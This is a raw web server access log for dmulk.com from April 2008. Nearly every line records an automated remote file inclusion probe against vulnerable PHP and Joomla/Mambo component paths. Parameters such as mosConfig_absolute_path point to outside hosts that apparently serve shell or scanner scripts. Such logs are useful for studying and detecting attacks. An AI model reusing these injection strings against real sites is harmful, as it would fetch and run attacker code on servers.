202.143.173.2 - - [17/Apr/2008:09:00:14 -0700] "GET /logs/access_080118.log/index.php?pag=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.203.73.105 - - [17/Apr/2008:09:00:34 -0700] "GET /logs/access_080312.log//claroline/tracking/userLog.php?rootSys=http://www.mineriaenlinea.com/survey/fonts/princeid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [17/Apr/2008:09:01:13 -0700] "GET /logs/access_080329.log//citywriter/head.php?path=http://www.mineriaenlinea.com/survey/fonts/princeid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [17/Apr/2008:09:01:13 -0700] "GET //citywriter/head.php?path=http://www.mineriaenlinea.com/survey/fonts/princeid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [17/Apr/2008:09:01:14 -0700] "GET /logs//citywriter/head.php?path=http://www.mineriaenlinea.com/survey/fonts/princeid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:02:01 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:02:01 -0700] "GET /logs/access.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:02:02 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:02:03 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:02:05 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:02:06 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.66.198 - - [17/Apr/2008:09:02:36 -0700] "GET /logs/access_080211.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://kamer.ba/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.18.192.226 - - [17/Apr/2008:09:04:12 -0700] "GET /MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.blackid.org/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.18.192.226 - - [17/Apr/2008:09:04:16 -0700] "GET /logs/MAMBO_path/administrator/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://www.blackid.org/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
84.40.22.92 - - [17/Apr/2008:09:04:56 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
84.40.22.92 - - [17/Apr/2008:09:04:57 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
82.94.235.198 - - [17/Apr/2008:09:05:20 -0700] "GET /components/com_rssxt/pinger.php?mosConfig_absolute_path=http://unternehmensberatung-im-gesundheitswesen.de//de/cms/js/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
82.94.235.198 - - [17/Apr/2008:09:05:21 -0700] "GET /logs/components/com_rssxt/pinger.php?mosConfig_absolute_path=http://unternehmensberatung-im-gesundheitswesen.de//de/cms/js/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:05:38 -0700] "GET /logs/access_071227.log/index.php?x=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:05:40 -0700] "GET /index.php?x=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:05:41 -0700] "GET /logs/index.php?x=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.235 - - [17/Apr/2008:09:06:00 -0700] "GET /logs/access_071215.log HTTP/1.0" 200 124992 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:09:06:49 -0700] "GET /logs/access_080312.log/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:09:06:50 -0700] "GET /components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.138.206.219 - - [17/Apr/2008:09:06:50 -0700] "GET /logs/components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:07:00 -0700] "GET /logs/access_071214.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:07:01 -0700] "GET //?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:07:02 -0700] "GET /logs//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 43557 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.7.187 - - [17/Apr/2008:09:07:19 -0700] "GET /megumi/Bracelet/?D=A HTTP/1.0" 200 1689 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:07:42 -0700] "GET /logs/access_071214.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:07:44 -0700] "GET //?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:07:45 -0700] "GET /logs//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 43557 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:07:50 -0700] "GET /logs/access.log/phphtml.php?htmlclass_path=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:07:50 -0700] "GET /phphtml.php?htmlclass_path=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:07:50 -0700] "GET /logs/phphtml.php?htmlclass_path=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:07:50 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:07:51 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:07:51 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:07:52 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:07:53 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:07:53 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.168.112.1 - - [17/Apr/2008:09:08:21 -0700] "GET /index2.php?pagina=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
217.168.112.1 - - [17/Apr/2008:09:08:21 -0700] "GET /logs/index2.php?pagina=http://www.marguis.es/marguis/modules/mod_archive/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
64.185.237.143 - - [17/Apr/2008:09:09:07 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
64.185.237.143 - - [17/Apr/2008:09:09:08 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xxxxfatalxxxx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:09:20 -0700] "GET /logs/access_080312.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:10:41 -0700] "GET /logs/access_080225.log/index.php?x=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:11:20 -0700] "GET /logs/access_071214.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:11:22 -0700] "GET //?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:11:23 -0700] "GET /logs//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 43557 "-" "libwww-perl/5.79" "www.dmulk.com"
202.60.74.190 - - [17/Apr/2008:09:11:25 -0700] "GET /logs/access.log/lib/static/header.php?set_menu=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [17/Apr/2008:09:11:26 -0700] "GET /lib/static/header.php?set_menu=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.74.190 - - [17/Apr/2008:09:11:26 -0700] "GET /logs/lib/static/header.php?set_menu=http://therealtypro.net/wp-admin/images/.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:12:05 -0700] "GET /logs/access_080329.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:12:05 -0700] "GET /components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:12:05 -0700] "GET /logs/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
209.248.224.106 - - [17/Apr/2008:09:12:19 -0700] "GET /logs/access_080211.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://kamer.ba/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:12:46 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:12:47 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:12:47 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:12:47 -0700] "GET /logs/access_080306.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
12.179.14.55 - - [17/Apr/2008:09:13:22 -0700] "GET /logs/access_080201.log//claroline/tracking/userLog.php?rootSys=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.80.134 - - [17/Apr/2008:09:13:29 -0700] "GET /logs/Encoder.php?base_dir=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
209.62.80.134 - - [17/Apr/2008:09:13:29 -0700] "GET /Encoder.php?base_dir=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:14:08 -0700] "GET /logs/access_080313.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:14:10 -0700] "GET //?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:14:11 -0700] "GET /logs//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 43557 "-" "libwww-perl/5.805" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:15:23 -0700] "GET /logs/access_080313.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:15:26 -0700] "GET //?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:15:27 -0700] "GET /logs//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 43557 "-" "libwww-perl/5.79" "www.dmulk.com"
210.203.73.105 - - [17/Apr/2008:09:15:29 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.mineriaenlinea.com/survey/fonts/princeid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [17/Apr/2008:09:15:30 -0700] "GET //config/dbutil.bck.php?confdir=http://www.mineriaenlinea.com/survey/fonts/princeid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
210.203.73.105 - - [17/Apr/2008:09:15:31 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.mineriaenlinea.com/survey/fonts/princeid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
204.15.10.144 - - [17/Apr/2008:09:16:12 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unternehmensberatung-im-gesundheitswesen.de//de/cms/js/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
204.15.10.144 - - [17/Apr/2008:09:16:12 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://unternehmensberatung-im-gesundheitswesen.de//de/cms/js/cmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
89.218.85.18 - - [17/Apr/2008:09:16:23 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://geocities.com/via.lita/img.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
12.179.14.55 - - [17/Apr/2008:09:16:55 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.179.14.55 - - [17/Apr/2008:09:16:56 -0700] "GET //config/dbutil.bck.php?confdir=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
12.179.14.55 - - [17/Apr/2008:09:16:56 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.stiri-mondene.com//me.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.239.5.15 - - [17/Apr/2008:09:17:05 -0700] "GET /logs/access_080207.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:17:08 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.245.149.70 - - [17/Apr/2008:09:17:15 -0700] "GET /logs/access_080201.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.204.60.206 - - [17/Apr/2008:09:17:45 -0700] "GET /logs/access_080207.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:17:55 -0700] "GET /logs/access_080118.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:17:55 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:17:55 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.52.79.138 - - [17/Apr/2008:09:18:48 -0700] "GET /logs/access_080306.log/components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.rehau-trocal.ru/j/.log/idscan6?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:19:34 -0700] "GET /logs/access_080111.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:19:47 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.149.179.203 - - [17/Apr/2008:09:19:54 -0700] "GET /logs/access_080312.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.232.108.82 - - [17/Apr/2008:09:20:14 -0700] "GET /logs/access_080302.log//agendax/addevent.inc.php?agendax_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.108.82 - - [17/Apr/2008:09:20:15 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
72.232.108.82 - - [17/Apr/2008:09:20:15 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://holynova.net/administrator/components/com_comprofiler/safe2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
213.246.51.45 - - [17/Apr/2008:09:20:21 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "dmulk.com"
74.6.29.32 - - [17/Apr/2008:09:20:47 -0700] "GET /?N=A HTTP/1.0" 200 11590 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.62.80.134 - - [17/Apr/2008:09:21:17 -0700] "GET /Encoder.php?base_dir=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "dmulk.com"
209.62.80.134 - - [17/Apr/2008:09:21:17 -0700] "GET /logs/Encoder.php?base_dir=http://www.nameserver11.net/billing2/include/html/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:21:28 -0700] "GET /logs/access_080313.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:21:31 -0700] "GET //?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:21:32 -0700] "GET /logs//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 200 43557 "-" "libwww-perl/5.79" "www.dmulk.com"
213.219.217.74 - - [17/Apr/2008:09:22:32 -0700] "GET /logs/access.log//?mosConfig_absolute_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:23:14 -0700] "GET /logs/access_080129.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:23:14 -0700] "GET /components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:23:15 -0700] "GET /logs/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:23:37 -0700] "GET /logs/access.log/avatar.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:23:37 -0700] "GET /avatar.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
140.120.27.17 - - [17/Apr/2008:09:23:37 -0700] "GET /logs/avatar.php?page=http://www.phanom.ac.th/msnlist/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
90.183.251.27 - - [17/Apr/2008:09:23:42 -0700] "GET /logs/access_080129.log/components/com_swmenupro/ImageManager/Classes/ImageManager.php?mosConfig_absolute_path=http://exploits.icspace.net/teszos?& HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3)" "www.dmulk.com"
